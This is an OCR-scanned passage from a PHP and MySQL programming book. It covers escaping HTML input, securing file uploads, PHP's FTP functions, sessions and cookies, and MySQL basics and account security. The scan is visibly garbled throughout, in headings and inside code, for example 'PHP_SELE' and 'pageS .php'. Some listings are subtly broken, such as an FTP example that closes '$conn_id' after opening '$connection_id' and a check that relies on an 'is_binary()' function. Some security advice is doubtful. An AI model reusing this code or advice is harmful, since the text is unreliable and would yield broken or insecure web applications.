that support your application, such as e-mail transport and the operating 
system. The following sections tell you how to prevent bad user input from 
mucking up the works. 


Con(/ertin0 HTML special characters 

Sometimes, you want to allow users to enter HTML into your application. A 
blog comment system, for example, usually allows users to post hyperlinks. 
But you don’t have to open your application to just anything that users 
might want to put in. 

If you allow users to enter HTML, you should always convert HTML special 
characters to HTML entities by using the htmlentities () function. The 
htmlentities () function takes the string to be converted as its argument. 
The function then does a simple search-and-replace for the following HTML- 
special characters: 


♦ & (ampersand) becomes &amp;. 

-f " (double quote) becomes &quot;. 

♦ ' (single quote) becomes &#03 9;. 

♦ < (less than) becomes &lt;. 

♦ > (greater than) becomes &gt;. 



If you need to escape every character with special meaning in HTML, 
use htmlentities () rather than htmlspecialchars (). See www. 
w3schools . com/html/html_entities . asp for more information on 
characters that have special meaning in HTML. 
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Uptoadin^ files iVitfiout compromising 
the fiiesi^stem 

Most applications don’t need to upload files. These applications are more 
secure if you do not allow files uploaded. You can prevent file uploading 
with the f ile_uploads setting in your php. ini file. The setting is on by 
default, as follows: 

file_uploads = On 

Change the setting to Off to prevent any file uploads in PHP scripts. 

Some applications need to let users upload files. Unfortunately, this require¬ 
ment also creates the potential for serious security problems. Malicious 
users can 

♦ Launch Denial of Service (DoS) attacks. 

♦ Overwrite existing files. 

♦ Place malicious code on the server for later use. 

Because of the open nature of web applications, you can’t completely secure 
file upload functionality within your application, but you can mitigate the 
dangers. 

Avoiding doS attacks on the filesi^stem 

File uploads create the potential for DoS attacks because malicious users 
can upload extremely large files and use all available resources in the file¬ 
system in the process. Uploading large files can effectively bring the server 
down by preventing it from writing temporary files or virtual memory swap 
files. You can limit file sizes in php. ini, but doing so doesn’t prevent a 
scripted attack that tries to upload hundreds of 2MB files every second. 

You should certainly place limits on file sizes in php. ini. You should also 
create a separate filesystem specifically for uploaded files. This separate 
system keeps any mischief locked away from the rest of the server. The 
upload filesystem might fill up with junk files, making the file upload func¬ 
tionality of your application unavailable — but at least the entire server 
wouldn’t crash. 

(/alidatin^ files 

After a file is uploaded, you should validate that it’s a legitimate file. Although 
you might not be able to weed out every malicious upload, you can cut down 
on the most obvious ones. Here are a few ways you can validate files: 
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♦ Verify the filename extension. This check isn’t the most robust test 
(because someone can easily rename a file with a new extension), but 
it’s simple to do and can catch some of the less-sophisticated crackers 
who try to upload files such as spam_sender. php by using your image 
upload function. 

♦ Test for the basic file type you’re expecting. For example, if you’re 
expecting images, you can use the is_binary () function to weed out 
text files, such as PHP scripts, as shown in the following example: 

$input = $_POST ['input_file']; 
if (is_binarY($input)) { 

// proceed as normal 
}else { 

// reject the file, redirect the browser, etc. 

} 

♦ Run the file through an antivirus utility such as F-Prot (available at 

WWW. f-prot. com). 

Usm0 FTP functions to ensure safe file uploads 

It’s fairly common for web applications to allow users to upload files for one 
reason or another. For instance, some message boards allow users to upload 
small images or avatars that are shown next to each of that user’s posts. 
Other applications allow you to upload data files for analysis. You could use 
PHP’s built-in f open () function, which automatically opens a stream to a 
file or URL that allows users to upload files. Unfortunately, this method is 
ripe for exploitation by malicious users who can use it to upload files from 
remote servers onto your web server. 

Preventing this type of exploitation requires you to disable two settings in 
php. ini: register_globals and url_f open. Disabling these settings 
prevents users from using PHP’s built-in file upload without you explicitly 
enabling that functionality. 

After you disable these two functions in php. ini, you still need to allow 
users to upload files. Use PHP’s FTP function set, a much more secure 
method than f open (), to allow users to upload files. 

You can use the FTP functions fairly intuitively. First, you establish a connec¬ 
tion, then you upload the files you need, and finally, you close the connec¬ 
tion. Listing 5-1 shows how to use the FTP functions in PHP: 
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Listing 5-1: Using Basic FTP Functions 

<?php 

// set up basic connection 

$connection_id = ftp_connect($ftp_server); 

// login with username and password 

$login_result = ftp_login($connection_id, $ftp_username, 
$ftp_password); 

// check connection 

if ((!$connection_id) || (!$login_result)) { 

echo "FTP connection has failed!"; 

echo "Attempted to connect to $ftp_server for user 
$ftp_username"; 

exit ; 

} else { 

echo "Connected to $ftp_server, for user $ftp_ 
username"; 

} 

// upload the file 

$upload = ftp_put($connection_id, $destination_file, $source. 
file, FTP_BINARY); 

// check upload status 
if (!$upload) { 

echo "FTP upload has failed!"; 

} else { 

echo "Uploaded $source_file to $ftp_server as 
$destination_file"; 

} 

// close the FTP stream 
ftp_close($conn_id); 

?> 

Here are the most common FTP functions and their arguments: 

♦ ftp_connect( string $host [, int $port [, int $timeout 

] ] ): Connect to the FTP server — in this case, your weh server. 

♦ ftp_login( resource $ftp_stream, string $username, 
$string password ): Send login credentials to the FTP server. 

♦ ftp_put( resource $ftp_stream, string $remote_file, 
string $local_file, int $mode [, int $startpos] ):Put a 

file from the local machine to the server. 
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♦ ftp_get( resource $ftp_stream, string $local_file, 
string $remote_f ile, int $inode [, int $resuinepos] ): Get 

a file from the server and send it to a local machine. 

♦ ftp_close( resource $ftp_stream ): Close the connection to the 
server. 

You need to close the FTP stream as soon as you’re finished with it; other¬ 
wise, you have an open connection that’s vulnerable to hijacking. 


Chapter 6: Tracking Visitors 
(Pith Sessions 


In This Chapter 

Understanding sessions and cookies 
Using sessions 


7 his chapter looks at PHP’s built-in method for keeping track of visitors 
across multiple pages, called a session. The chapter starts out with an 
introduction to sessions and cookies and then jumps straight in by showing 
you how to use sessions to track visitors. 


Understanding Sessions and Cookies 

You’ve undoubtedly seen websites that track who you are, possibly welcom¬ 
ing you after you log in or presenting you with custom information about 
your account after logging in. There are a couple ways to do this, including 
sending the data along in a form with every request. But that isn’t secure 
and isn’t nearly flexible enough for today’s web applications. Luckily, 
there’s a better way — and it’s right at your fingertips: sessions. 

Looking at sessions 

A session in PHP is a secure way to track a user from page to page. With a 
session, you can store information about users, such as their e-mail address, 
name, phone number, and whatever other details you have, and automatically 
fill in that information wherever it’s needed on the site. For example, say 
that on login you load the user’s first name and e-mail address from your 
user database. You can store that information in a session, essentially 
hidden from the user, until you use it. 

You use session variables as you would any other variables. Behind the 
scenes, sessions are stored in an array called $_SESSiON. You store values 
just as you would with a named array in PHP. For example, you can keep 
track of an e-mail address and name like this: 

$_SESSI0N['emailAddress'] = "meSexample.com"; 

$_SESSION['firstName'] = "Steve"; 
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You can also use sessions to keep track of information filled in on a web form 
without having to carry that information through the site in hidden form 
variables. 

Wovking^ u/ith cookies 

Sessions are passed in browser cookies, which are little extra bits of informa¬ 
tion that get sent to and from a web browser. The actual bits of information, 
or what those bits actually are, is up to you, the programmer. For instance, 
you could send a cookie that contains the user’s name. The cookie could then 
be stored on the user’s computer and the next time she visits the site, the 
cookie would be sent to your program, which would then present a person¬ 
alized greeting. 

However, cookies are like any other data that you get from a user — the data 
from cookies needs to be sanitized (as we discuss in the preceding chapter) 
because it can’t be trusted. In other words, once your program sends a cookie 
to a visitor’s browser, the visitor can edit or change that cookie to be any¬ 
thing he wants. So if you (the web developer) are using the cookie to store 
a username, the visitor can change the username to whatever he wants and 
then send it back to your program. 

The possibility of users editing their cookies is largely solved by simply 
using sessions. When a session cookie is created, it uses a hash value, 
which is a long string of characters. This means that even if users change 
the cookie value, in other words, if they change that hash, they aren’t really 
changing anything that you’re using in your program directly. 

Instead, PHP handles the translation of that hash from the cookie on your 
behalf, and then you can get on with the business of using things in the $_ 
SESSION array, as explained earlier. The actual values that you store in the 
$_SESSiON array are never seen by the user; they exist only on the server. 

Of course, using sessions with cookies means that cookies need to be 
enabled in the user’s browser. If they aren’t, then the user can’t use the 
application. Therefore, the logical place to continue this discussion is by 
showing how to check if cookies are enabled. 

Checking if cookies are enabled 

You use the setcookie () function in PHP to set a cookie in the browser. 
Then if your program can read that cookie, you know that cookies are 
enabled. The setcookie () function accepts several arguments to define 
the behavior of the cookie. For example, you set the name of the cookie, but 
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you can also set how long the cookie will he active and whether it will he 
used over secure connections only, along with several other options. 

For our purposes, we simply set the name of the cookie and a value. You can 
follow these steps to check if cookies are enabled in your browser. 

1 . Open your text editor and create a new empty file. 

2 . Within the file, enter the following code: 

<?php 

if (isset($_GET['cookiecheck' ] )) { 

if (isset($_COOKlE['testcookie']) ) { 
print "Cookies are enabled"; 

} else { 

print "Cookies are not enabled"; 

} 

} else { 

setcookie('testcookie', "testvalue"); 

die(header("Location: " . $_SERVER['PHP_SELE'] . 

"?cookiecheck=l")); 

} 

?> 

3 . Save the file as cookie .php in your document root. 

4. Point your web browser toward http: //localhost/cookie, php 
and you’ll see a page like the one in Figure 6-1. 
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If cookies aren’t enabled in your browser, you’ll see a page like that in 
Figure 6-2. 


Figure 6-2: 

Showing 
that cookies 
are not 
enabled. 



Note: If you’d like to test the page with cookies disabled, you can do so. 

First, close the browser and then reopen it (without going to the cookie. 
php page). In Internet Explorer, go to Internet Options. On the Privacy tab, 
slide the Settings slider up to block all cookies. In Firefox, go to Options, and 
select the Privacy tab. Within the History section, select Use custom settings 
for history and then uncheck the “Accept cookies from sites” check box. 

Now load the cookie .php page. 

Now that you know that cookies are enabled you can safely begin to use 
sessions. 


Usin^ Sessions to Pass Data 

With cookies enabled, which they usually are in most browsers, you can 
begin to use sessions to store data between pages of your PHP application. 

Starting a session 

The key to using sessions is the session_start () function. You call 
session_start () on every page and subsequently have access to all the 
items in the $_SESSiON array. 
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It might seem like a bit of an odd name for the function, session_start (), 
because on most pages you really just want to continue the session and 
access the variables that are there. But in reality, session_start () does 
both: It starts a new session if need be and continues an existing session 
where appropriate. 

The session_start () function is called simply like this: 

<?php 

session_start(); 

// Other PHP statements here 
?> 

Here’s code for a few pages that track when you accessed the first page of 
the application. This shows the use of the session_start () function and 
then creation of a variable to hold the initial access time. 

Listing 6-1 shows the code for the first page, called pagel .php. 


Listing 6-1: Creating a Session Variable 

<?php 

session_start(); 

$_SESSI0N['accessTime'] = date("M/d/Y g:i:sa"); 
print "This is page l<br />"; 

print "You accessed the application at: " . $_ 

SESSION['accessTime']; 
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print "<div><a href=\"page2.php\">Continue to next page</ 
a></div>'' ; 

?> 


When viewed in a browser, the page looks like Figure 6-3. 


Track! 

with 
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Figure 6-3: 

Accessing 
the first 
page of the 
application. 



The next page in the application then starts the session and can access any 
variables already set in the session. Listing 6-2 shows code for the second 
page, page2 .php. 


Listing 6-2: The Second Page Accessing Session Variables 

<?php 

session_start(); 

print "This is page 2<br />"; 

print "You accessed the application at: " . 

$_SESSION['accessTime']; 

print "<div><a href=\"page3.php\">Continue to next page</a></ 
div>"; 


?> 

Notice in the code in Listing 6-2 that the variable $_ 

SESSION [' accessTime ' ] is not set again, but merely accessed after the 
session is started. When you’re on pagel. php and click the link to go to the 
next page, you get a page like that in Figure 6-4. 























Figure 6-4: 

Accessing 
the second 
page of the 
application. 
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You can store just about anything in a session, but you should be aware that 
session can, and sometimes does, disappear for a variety of reasons. One 
reason a session might disappear is that it times out. If users sit on a page 
for too long, the session might not be there when they begin using the appli¬ 
cation again. 

In Book VII, you see how to change the session timeout value. However, even 
if you change the session timeout, the session can still go away. For example, 
if users clear their cookies in the middle of a session, then the session 
cookie will disappear and a new one will be started. 

The practical implication of session disappearance is that any variables 
you’ve previously set will also disappear. Therefore, it’s good practice to 
check if the session contains the values that you expect prior to using them. 
There are a couple ways to do this. One way would be to check all variables 
prior to accessing them. For example, you could change Listing 6-2 to check 
for the $_SESSI0N [ ' accessTime ' ] variable prior to using it in output. 
Listing 6-3 shows what that would look like. 


Listing 6-3: Checking if a Session Variable is Set before Using It 

<?php 

session_start(); 

if (!isset($_SESSION['accessTime'])) { 
die(header("Location: pagel.php")); 

} 

print "This is page 2<br />"; 

(continued) 
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Listing 6-3 (continued) 


print "You accessed the application at: " . $_ 

SESSION['accessTime']; 

print "<div><a href=\"page3.php\">Continue to next page</a></ 
div>"; 


?> 


Listing 6-3 added the following code: 

if (!isset($_SESSI0N['accessTime'])) { 
die(header("Location: pagel.php")); 

} 



The location of that code is important. Because that code needs to send an 
HTTP header, it needs to appear prior to any other output. So for Instance, 
if that code appeared below the “This is page 2” output, it wouldn’t work 
because the headers have already been sent. The code appears prior to any 
output but also importantly, appears after the session_start () function. 


Best practice is to check for the existence of session variables before you 
use them, as just shown. However, it can get quite cumbersome to check 
all the variables that you might use in a big application. With that in mind, 
another option is to set a global session variable and check for its existence 
rather than each variable individually. Here’s how to do that. 


Listing 6-4 shows an updated version of the Listing 6-1, pagel .php. In this 
code, there’s a single addition, a new session variable called appStarted. 


Listing 6-4: Adding a Global Variable for Session 

<?php 

session_start(); 

$_SESSION['appStarted'] = true; 

$_SESSI0N['accessTime'] = date("M/d/Y g:i:sa"); 
print "This is page l<br />"; 

print "You accessed the application at: " . $_ 

SESSION['accessTime']; 

print "<div><a href=\"page2.php\">Continue to next page</a></ 
div>"; 
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You can then change other pages in the application to check for the exis¬ 
tence of this variable, as in the change noted in Listing 6-5. 


Listing 6-5: Checking for the Global Session Variable 

<?php 

session_start(); 

if (!isset($_SESSION[' appStarted']) ) { 

die(header("Location: pagel.php")); 

} 

print "This is page 2<br />"; 

print "You accessed the application at: " . $_ 

SESSION['accessTime']; 

print ''<div><a href=\"pageS .php\">Continue to next page</a></ 
div>”; 


?> 

Ctosin^ a session 

Now you know how to start a session, but how do sessions get closed? The 
long and short of it is that sessions close at the end of the PHP program. 

This means that you don’t need to do anything explicit in order to close 
sessions. 

Usin^ session_Wvite_ctose () 

There are certain situations where you do in fact need to explicitly close the 
session. This might be the case if two programs or two sections of a program 
need to write to the session at the same time — or if you’re using a redirect 
and the server doesn’t quite get the session closed in time before the next 
page tries to pick up the session. In either case, the session_write_ 
close () function will write the session parameters to the server and close 
or end the session. You call session_write_close () just like session_ 
start(); 

session_write_close(); 

Any attempt to write a session variable after session_write_close () has 
been called may result in an error or may fail silently, depending on your 
PHP configuration. 
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Understanding Other Session Options 

Several options are available when working with sessions in PHP, many of 
which you’ll never encounter and others that you’ll encounter in special 
situations. Table 6-1 lists some of the options. 


Table 6-1 

Selecting Session Options 

Option 

Description 

session id 

Obtain the current session identifier or set one. 

session name 

Obtain the current session name or set one. 

session destroy 

Unset all variables from the current session. 


Book VI shows the use of session_destroy in order to provide logout 
functionality on a website. 

You can read about other session-related functions on the PHP website at 

www.php.net/manual/book.session.php. 










BookV 


MySQL 

M^SQL Account PrMte^es 


Privilege 

Description 

ALL 

All privileges 

ALTER 

Can alter the structure of tables 

CREATE 

Can create new databases ortables 

DELETE 

Can delete rows in tables 

DROP 

Can drop databases ortables 

FILE 

Can read and write files on the server 

GRANT 

Can change the privileges on a MySQL account 

INSERT 

Can insert new rows into tables 

SELECT 

Can read data from tables 

SHUTDOWN 

Can shut down the MySQL server 

UPDATE 

Can change data in a table 

USAGE 

No privileges 


web 

extras 


For more info on MySQL, go to www. dummies . com/extras/phpmysql 
j avascripthtmlSaio. 
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Chapter 1: Introducing MySQL 


In This Chapter 

Discovering how MySQL works 
Communicating with MySQL 
u* Securing data stored in MySQL 


any dynamic websites require a backend database. The database can 
y r i contain information that the web pages display to the user, or the 
purpose of the database might be to store information provided by the user. 
In some applications, the database both provides available information and 
stores new information. 


MySQL, the most popular database for use in websites, was developed to be 
fast and small, specifically for websites. MySQL is particularly popular for 
use with websites that are written in PHP, and PHP and MySQL work well 
together. 

This chapter provides an Introduction to MySQL, and explains how it works 
and how you can communicate with it. As discussed in Book IV, Chapter 3, 
much of this information also applies to the SQLite database introduced in 
that chapter. 


Emminin^ Hou/ MySQL Works 

The MySQL software consists of the MySQL server, several utility programs 
that assist in the administration of MySQL databases, and some supporting 
software that the MySQL server needs (but you don’t need to know about). 
The heart of the system is the MySQL server. 

The MySQL server is the manager of the database system. It handles all your 
database instructions. For instance, if you want to create a new database, you 
send a message to the MySQL server that says, for instance, “create a new 
database and call it newdata.” The MySQL server then creates a subdirectory 
in its data directory, names the new subdirectory newdata, and puts the nec¬ 
essary files with the required format into the newdata subdirectory. In the 
same manner, to add data to that database, you send a message to the MySQL 
server, giving it the data and telling it where you want the data to be added. 




m Understanding database Structure 


Before you can pass instructions to the MySQL server, it must be running 
and waiting for requests. The MySQL server is usually set up so that it starts 
when the computer starts and continues running all the time. This is the 
usual setup for a website. However, it isn’t necessary to set it up to start 
when the computer starts. If you need to, you can start it manually whenever 
you want to access a database. When it’s running, the MySQL server listens 
continuously for messages that are directed to it. Installing and starting the 
MySQL server are discussed in Book 1, Chapter 4. 


Understanding Database Structure 

MySQL is a Relational Database Management System (RDBMS). Your MySQL 
server can manage many databases at the same time. In fact, many people 
might have different databases managed by a single MySQL server. Each 
database consists of a structure to hold the data and the data itself. A data¬ 
base can exist without data, only a structure, be totally empty, twiddling its 
thumbs and waiting for data to be stored in it. 

Data in a database is stored in one or more tables. You must create the data¬ 
base and the tables before you can add any data to the database. First you 
create the empty database. Then you add empty tables to the database. 

Database tables are organized like other tables that you’re used to — in 
rows and columns. Each row represents an entity in the database, such as a 
customer, a book, or a project. Each column contains an item of information 
about the entity, such as a customer name, a book name, or a project start 
date. The place where a particular row and column intersect, the individual 
cell of the table, is called a field. 

Tables in databases can be related. Qften a row in one table is related to 
several rows in another table. For instance, you might have a database 
containing data about books you own. You would have a book table and an 
author table. Qne row in the author table might contain information about 
the author of several books in the book table. When tables are related, you 
include a column in one table to hold data that matches data in the column 
of another table. 

Qnly after you’ve created the database structure can you add data. More 
information on database structure and instructions for creating the structure 
is provided in Chapter 3 of this minibook. 


Communicating u/ith MySQL 

All your interaction with the database is accomplished by passing messages 
to the MySQL server. The MySQL server must be able to understand the 
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instructions that you send it. You communicate using Strucfured Query 
Language (SQL), which is a standard computer language understood, at least 
in some form, by most database management systems. 

To make a request that MySQL can understand, you build a SQL statement 
and send it to the MySQL server. The following sections tell you how to do 
that. 

BuiUin^ SQL ((ueries 

SQL is almost English; it’s made up largely of English words, put together into 
strings of words that sound similar to English sentences. In general (fortu¬ 
nately), you don’t need to understand any arcane technical language to write 
SQL queries that work. 

The first word of each statement is its name, which is an action word (a 
verb) that tells MySQL what you want to do. The statements that we discuss 
in this minibook are create, drop, alter, show, insert, load, select, 
UPDATE, and DELETE. This basic vocabulary is sufficient to create — and 
Interact with — databases on websites. 

The statement name is followed by words and phrases — some required and 
some optional — that tell MySQL how to perform the action. Eor instance, 
you always need to tell MySQL what to create, and you always need to tell it 
which table to insert data into or to select data from. 

The following is a typical SQL statement. As you can see, it uses English words: 

SELECT lastName FROM Member 

When a statement uses select, it’s known as a query, because you’re 
querying the database for Information. This query retrieves all the last 
names stored in the table named Member. More complicated queries, such 
as the following, are less English-like: 

select lastName, firstName FROM Member WHERE state="CA'' AND 
citY="Fresno" ORDER BY lastName 

This query retrieves all the last names and first names of members who live 
in Eresno and then puts them in alphabetical order by last name. Although 
this query is less English-like, it’s still pretty clear. 

Here are some general points to keep in mind when constructing a SQL 
statement, as illustrated in the preceding sample queries: 

♦ Capitalization: In this book, we put SQL language words in all caps; 
items of variable information (such as column names) are usually given 
labels that are all or mostly lowercase letters. We did this to make it 
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easier for you to read — not because MySQL needs this format. The case 
of the SQL words doesn’t matter; for example, select is the same as 
SELECT, and from is the same as from, as far as MySQL is concerned. 

Qn the other hand, the case of the table names, column names, and 
other variable information does matter if your operating system is Unix 
or Linux. When you’re using Unix or Linux, MySQL needs to match the 
column names exactly, so the case for the column names has to be cor¬ 
rect — for example, lastname isn’t the same as lastName. Windows, 
however, isn’t as picky as Unix and Linux; from its point of view, 
lastname and lastName are the same. 

♦ Spacing: SQL words must be separated by one or more spaces. It 
doesn’t matter how many spaces you use; you could just as well use 20 
spaces or just 1 space. SQL also doesn’t pay any attention to the end of 
the line. You can start a new line at any point in the SQL statement or 
write the entire statement on one line. 

♦ Quotes: Notice that CA and Fresno are enclosed in double quotes (") 
in the preceding query. CA and Fresno are a series of characters called 
text strings, or character strings. You’re asking MySQL to compare the text 
strings in the SQL query with the text strings already stored in the data¬ 
base. When you compare numbers (such as integers) stored in numeric 
columns, you don’t enclose the numbers in quotes. (In Chapter 3 of this 
minibook, we explain the types of data that you can store in a MySQL 
database.) 

We discuss the details of specific SQL queries in the sections of the book 
where we discuss their uses. For instance, in Chapter 3 in this minibook, we 
discuss the create query in detail when we cover the details of creating the 
database structure; we also discuss the insert query when we tell you how 
to add data to the database. 

Senitin^ SQL {(ueries 

You can send a SQL query to MySQL several ways. In this book, we cover the 
following two methods of sending queries: 

♦ The mysql client: When you install MySQL, a text-based mysql client is 
automatically installed. This simple client can be used to send queries. 

♦ PHP built-in functions: You communicate with a MySQL database from 
PHP scripts by using PHP built-in functions designed specifically for this 
purpose. The functions connect to the MySQL server and send the SQL 
query. Accessing MySQL databases from PHP scripts is discussed in 
detail in Chapter 5 of this minibook. 
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When MySQL is installed, a simple, text-based program called mysql (or 
sometimes the command line interface or the CLl) is also installed. Programs 
that communicate with servers are client software; because this program 
communicates with the MySQL server, it’s a client. When you enter SQL 
queries in this client, the response is returned to the client and displayed 
onscreen. The monitor program can send queries across a network; it 
doesn’t have to be running on the machine where the database is stored. 

This client is always installed when MySQL is installed, so it’s always avail¬ 
able. It’s quite simple and quick if you know SQL and can type your queries 
without mistakes. 

To send SQL queries to MySQL from the mysql client, follow these steps: 

1 . Locate the mysql client. 

By default, the mysql client program is installed in the subdirectory bin, 
under the directory where MySQL is installed. In Unix and Linux, the 
default is /usr/local/mysql/bin or /usr/local/bin. In Windows, 
the default is c : XProgram Files\MySQL\MySQL Server 5.0\bin. 
However, the client might be installed in a different directory. Qr, if you 
aren’t the MySQL administrator, you might not have access to the mysql 
client. 

If you don’t know where MySQL is installed or can’t run the client, ask 
the MySQL administrator to put the client somewhere where you can 
run it or to give you a copy that you can put on your own computer. 

2 . Start the client. 

In Unix and Linux, type the path/filename (for example, /usr/local/ 
mysql/bin/mysql). In Windows, open a command prompt window 
and then type the pathXfilename (for example, c : \ Program Files\ 
MySQL\MySQL Server 5.0\bin\mysql). This command starts the 
client if you don’t need to use an account name or a password. If you 
need to enter an account or a password or both, use the following 
parameters: 

• -u user: user is your MySQL account name. 

• -p: This parameter prompts you for the password for your MySQL 


account. 


For instance, if you’re in the directory where the mysql client is located, 
the command might look like this: 


mysql -u root -p 
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3 . If you’re starting the mysql client to access a database across the net¬ 
work, use the following parameter after the mysql command: 

-h host, where host is the name of the machine where MySQL is 
located. 

For instance, if you’re in the directory where the mysql client is located, 
the command might look like this: 

mysql -h mysqlhost .mycompany. com -u root -p 

Press Enter after typing the command. 

4. Enter your password when prompted for it. 

The mysql client starts, and you see something similar to this: 

Welcome to the MySQL monitor. Commands end with ; or \g. 

Your MySQL connection id is 459 to server version: 5.0.15 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer. 
mysql> 

5. Select the database that you want to use. 

At the mysql prompt, type the following: 

use databasename 



Use the name of the database that you want to query. 

Some SQL statements, such as show databases, don’t require that you 
select a database. Eor those statements, you can skip Step 5. 

6 . At the mysql prompt, type your SQL statement followed by a semico¬ 
lon 0) and then press Enter. 

If you forget to type the semicolon (;) at the end of the query, the mysql 
client doesn’t execute the statement. Instead, it continues to display the 
prompt (mysq>) until you enter a semicolon. 

The response to the statement is displayed onscreen. 

7. To leave the mysql client, type quit at the prompt and then press Enter. 


You can use the mysql client to send a SQL statement that you type yourself, 
and it returns the response to the statement. 


Protecting \lour MySQL Databases 

You need to control access to the information in your database. You need to 
decide who can see the data and who can change it. If a bad guy gets a list 
of your customers’ private information (such as credit card numbers), you 
clearly have a problem. You need to guard your data. 
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MySQL provides a security system for protecting your data. The system 
includes the following: 

♦ MySQL accounts: No one can access the data in your database without 
an account. The account has a name the user must use. The account can 
also have a password that users must provide before they access the 
account. In addition, each account specifies where you can access the 
data from, such as only from the current computer or only from a spe¬ 
cific domain. 

♦ Permissions: MySQL uses account permissions to specify who can do 
what. Anyone using a valid account can connect to the MySQL server, 
but he or she can do only those things that are allowed by the permis¬ 
sions for the account. For example, an account might be set up so that 
users can select data but cannot insert or update data. Qr, an account 
might be set up so that it can change the data in a specific table, but can 
only look at the data in another table. 

You can create and delete accounts, add and change passwords, and add 
and remove permissions with SQL queries. You can send the SQL queries 
with either of the methods described in the preceding section. You can also 
manage your MySQL accounts with features provided by phpMyAdmin. We 
describe administering your MySQL databases in Chapter 2 of this minibook. 
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In This Chapter 

Administering MySQL 

u* Establishing and controlling access to data 
u* Creating and managing acconnts 
u* Backing np and restoring databases 
Getting the newest version of MySQL 


s discussed previously, MySQL is database management software, 
r * It manages databases that contain the information you need for the 
dynamic website that you are building. Your goal is to store data in a data¬ 
base or retrieve data from the database. You can store and retrieve data 
directly (see Chapters 3 and 4 of this minibook) or store and retrieve data 
from PHP scripts (see Chapter 5 of this minibook). In addition, a MySQL 
administrator is required to ensure that MySQL performs its work correctly 
and efficiently. 


We describe MySQL administration in this chapter. In the first few sections 
of this chapter, we give you the preliminary information you need to know 
about MySQL administration and how you can control access to your data 
with account names, hostnames, and passwords. Later, we give you specific 
information on how to add accounts and change passwords and privileges. 
Backing up and restoring the database are also important administrative 
tasks, and we tell you how to do that in this chapter as well. Finally, as a 
MySQL administrator, you’ll also need to make sure that you’re using the 
latest version of MySQL, and we discuss that in the final section of this 
chapter. 


Understanding the Administrator Responsibilities 

Administering MySQL encompasses the tasks required to ensure that 
MySQL can perform its data management duties in an efficient and secure 
manner. 

You might be responsible for some or all of tbe administrative tasks, depending 
on how you access MySQL. If you’re using MySQL on a web hosting company’s 
computer, the hosting company performs most or all of the administrative 
tasks. However, if you’re using MySQL on your local computer, you’re the 
administrator, entirely responsible for the administration of MySQL. 
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The duties of the administrator include the following: 

♦ Install MySQL. Described in Book I, Chapter 4. If MySQL is running on a 
web hosting computer, you’re not responsible for installation. 

♦ Start and shut down the MySQL server. Described in Book I, Chapter 4. 
If MySQL is running on a web hosting computer, you don’t start or stop 
the server. 

♦ Create and maintain MySQL user accounts. No one can access the data 
in your database without an account. Accounts need to be installed and 
removed, passwords added or removed, and privileges assigned to or 
removed from accounts. We describe administering user accounts in the 
section “Setting Up MySQL Accounts,” later in this chapter. 

If you’re using MySQL at a web hosting company, you might or might not 
be allowed to create or alter MySQL accounts. You might be limited to 
one account with defined privileges. 

♦ Back up data. You need to keep backup copies of your data in case 
the data is lost or damaged. If you’re using MySQL at a web hosting 
company, you need to check with that company regarding its backup 
procedures. You might still want to keep your own backup, just in case 
the web hosting company’s backup procedures fail. You can read about 
backup databases in the section “Backing Up Your Database,” later in 
this chapter. 

♦ Update MySQL. Install new MySQL releases when needed. If MySQL is 
running on a web hosting computer, you’re not responsible for updates. 
We talk about upgrading MySQL in the section “Upgrading MySQL,” later 
in this chapter. 


Default Access to l/our Data 

When MySQL is installed, a default MySQL account named root is installed. 
Sometimes, this account is installed without a password. If you configured 
MySQL on Windows with the Configuration Wizard (as described in Book I, 
Chapter 4), you set a password during the configuration procedure. In addi¬ 
tion, you might have set up an anonymous account with no account name and 
no password. If you’re accessing MySQL through a web hosting company, the 
company provides you with the account name and password to use. 



In general, you shouldn’t use the account root without a password. If your 
installation set up a root account without a password, add a password right 
away. The root account is set up with all privileges. You use this account 
for the administration of your MySQL databases. You don’t need an account 
with all privileges to access your MySQL databases, or to add and retrieve 
data. Therefore, in most cases, you want to create an account with fewer 
privileges that you use to access the data from your PHP scripts, and we tell 
you how to do that in this chapter. 
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Controlling Access to f/our Data 

You need to control access to the information in your database. You need 
to decide who can see the data and who can change it. Imagine what would 
happen if your competitors could change the information in your online 
product catalog or copy your list of customers — you’d be out of business in 
no time flat. Clearly, you need to guard your data. 
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Fortunately, MySQL provides a security system for protecting your data. No 
one can access the data in your database without an account. Each MySQL 
account has the following attributes: 


♦ An account name 

♦ A hostname — the machine from which the account can access the 
MySQL server 

♦ A password 

♦ A set of privileges 


To access your data, someone must use a valid account name and know the 
password associated with that account. In addition, that person must be 
connecting from a computer that’s permitted to connect to your database 
via that specific account. 


After the user is granted access to the database, what he or she can do to 
the data depends on what privileges have been set for the account. Each 
account is either allowed or not allowed to perform an operation in your 
database, such as select, delete, insert, create, or drop. (Table 2-1, 
later in this chapter, explains those privileges.) The settings that specify 
what an account can do are privileges. You can set up an account with all 
privileges, no privileges, or anything in between. For instance, for an online 
product catalog, you want the customer to be able to see the information in 
the catalog but not change that information. 

When a user attempts to connect to MySQL and execute a statement, MySQL 
controls access to the data in two stages: 

h Connection verification: MySQL checks the validity of the account name 
and password, and checks whether the connection is coming from a host 
that’s allowed to connect to the MySQL server by using the specified 
account. If everything checks out, MySQL accepts the connection. 

2. Request verification: After MySQL accepts the connection, it checks 
whether the account has the necessary privileges to execute the speci¬ 
fied statement. If it does, MySQL executes the statement. 
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Any statement that you send to MySQL can fail either because the connection 
is rejected in the first step or because the statement isn’t permitted in the 
second step. An error message is returned to help you identify the source 
of the problem. 

In the following sections, we describe accounts and privileges in detail. 


Account names and hostnames 

Together, the account name and hostname (the name of the computer 
that’s authorized to connect to the database) identify a unique account. 
Two accounts with the same name but different hostnames can exist and 
can have different passwords and privileges. However, you can’t have two 
accounts with the same name and the same hostname. 


The MySQL server accepts connections from a MySQL account only when 
that account is connecting from hostname. When you build the grant or 
REVOKE statement (which we describe in the section “Changing privileges,” 
later in this chapter), you identify the MySQL account by using both the 
account name and the hostname in the following format: accountname& 
hostname (for instance, root@localhost). 



The MySQL account name is completely unrelated in any way to the Unix, 
Linux, or Windows username (also sometimes called the login name). If 
you’re using an administrative MySQL account named root, that account 
is not related to the Unix or Linux root login name. Changing the MySQL 
account name doesn’t affect the Unix, Linux, or Windows login name — and 
vice versa. 


MySQL account names and hostnames have the following characteristics: 

♦ An account name can be up to 16 characters long. You can use special 
characters in account names, such as a space or a hyphen (-). However, 
you can’t use wildcards in the account name. 

♦ An account name can be blank. If an account exists in MySQL with a 
blank account name, any account name is valid for that account. A user 
can use any account name to connect to your database if the user is con¬ 
necting from a hostname that’s allowed to connect to the blank account 
name and uses the correct password (if a password is required). You 
can use an account with a blank name to allow anonymous users to con¬ 
nect to your database. 
